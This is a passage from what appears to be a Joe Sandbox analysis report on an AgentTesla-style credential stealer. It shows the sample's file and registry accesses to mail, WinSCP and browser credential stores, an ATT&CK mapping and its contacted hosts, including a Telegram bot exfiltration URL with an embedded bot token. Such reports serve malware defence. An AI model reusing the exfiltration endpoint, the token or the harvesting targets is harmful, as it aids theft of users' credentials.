                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123F53C GetUserNameW,4_2_0123F53C

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Qasvjoldkyh.exe PID: 388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 1496, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation                		11
                Registry Run Keys / Startup Folder                		112
                Process Injection                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                Account Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Web Service                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                PowerShell                		Boot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Masquerading                		1
                Credentials in Registry                		114
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration11
                Encrypted Channel                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)131
                Virtualization/Sandbox Evasion                		NTDS211
                Security Software Discovery                		Distributed Component Object Model111
                Input Capture                		Scheduled Transfer3
                Non-Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script112
                Process Injection                		LSA Secrets2
                Process Discovery                		SSH1
                Clipboard Data                		Data Transfer Size Limits14
                Application Layer Protocol                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Hidden Files and Directories                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Owner/User Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                Remote System Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                System Network Configuration Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830902 Sample: file.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 51 api4.ipify.org 2->51 53 api.telegram.org 2->53 55 api.ipify.org 2->55 65 Snort IDS alert for network traffic 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Telegram RAT 2->69 71 5 other signatures 2->71 8 file.exe 1 8 2->8         started        12 Qasvjoldkyh.exe 4 2->12         started        14 kDPmkTm.exe 4 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 45 C:\Users\user\AppData\...\Qasvjoldkyh.exe, PE32 8->45 dropped 47 C:\Users\...\Qasvjoldkyh.exe:Zone.Identifier, ASCII 8->47 dropped 49 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 8->49 dropped 85 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->85 87 May check the online IP address of the machine 8->87 89 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->89 91 Creates multiple autostart registry keys 8->91 18 file.exe 17 5 8->18         started        23 powershell.exe 15 8->23         started        25 file.exe 8->25         started        93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 97 Encrypted powershell cmdline option found 12->97 27 Qasvjoldkyh.exe 12->27         started        29 powershell.exe 12->29         started        99 Injects a PE file into a foreign processes 14->99 31 powershell.exe 14->31         started        33 kDPmkTm.exe 14->33         started        signatures6 process7 dnsIp8 57 api4.ipify.org 104.237.62.211, 443, 49697, 49700 WEBNXUS United States 18->57 59 api.telegram.org 149.154.167.220, 443, 49698, 49702 TELEGRAMRU United Kingdom 18->59 63 2 other IPs or domains 18->63 41 C:\Users\user\AppData\Roaming\...\kDPmkTm.exe, PE32 18->41 dropped 43 C:\Users\user\...\kDPmkTm.exe:Zone.Identifier, ASCII 18->43 dropped 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->73 75 Tries to steal Mail credentials (via file / registry access) 18->75 77 Creates multiple autostart registry keys 18->77 35 conhost.exe 23->35         started        61 api.ipify.org 27->61 79 Tries to harvest and steal browser information (history, passwords, etc) 27->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->81 83 Installs a global keyboard hook 27->83 37 conhost.exe 29->37         started        39 conhost.exe 31->39         started        file9 signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe36%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                file.exe44%VirustotalBrowse
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe36%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe44%VirustotalBrowse
                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe36%ReversingLabsByteCode-MSIL.Trojan.Pwsx

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                15.2.Qasvjoldkyh.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://api.telegram.org40%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                https://api.ipify.org40%URL Reputationsafe
                https://urn.to/r/sds_see0%URL Reputationsafe
                http://james.newtonking.com/projects/json0%URL Reputationsafe
                http://www.microsoft.s0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api4.ipify.org
                		104.237.62.211
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    api.ipify.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high
                        https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.ipify.orgfile.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org4file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.microsoft.skDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgfile.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org4Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.newtonsoft.com/jsonschemakDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.newtonsoft.com/jsonkDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.nuget.org/packages/Newtonsoft.Json.Bsonfile.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://api4.ipify.orgQasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://urn.to/r/sds_seefile.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://api.telegram.orgfile.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://james.newtonking.com/projects/jsonkDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://api.ipify.orgQasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              149.154.167.220
                                              		api.telegram.orgUnited Kingdom
                                              		62041TELEGRAMRUfalse
                                              104.237.62.211
                                              		api4.ipify.orgUnited States
                                              		18450WEBNXUSfalse

                                              Private

                                              IP
                                              192.168.2.1

                                              General Information

                                              Joe Sandbox Version:37.0.0 Beryl
                                              Analysis ID:830902
                                              Start date and time:2023-03-20 19:36:46 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 37s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:20
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@22/15@8/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 45
                                              • Number of non-executed functions: 8
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              19:37:51API Interceptor102x Sleep call for process: powershell.exe modified
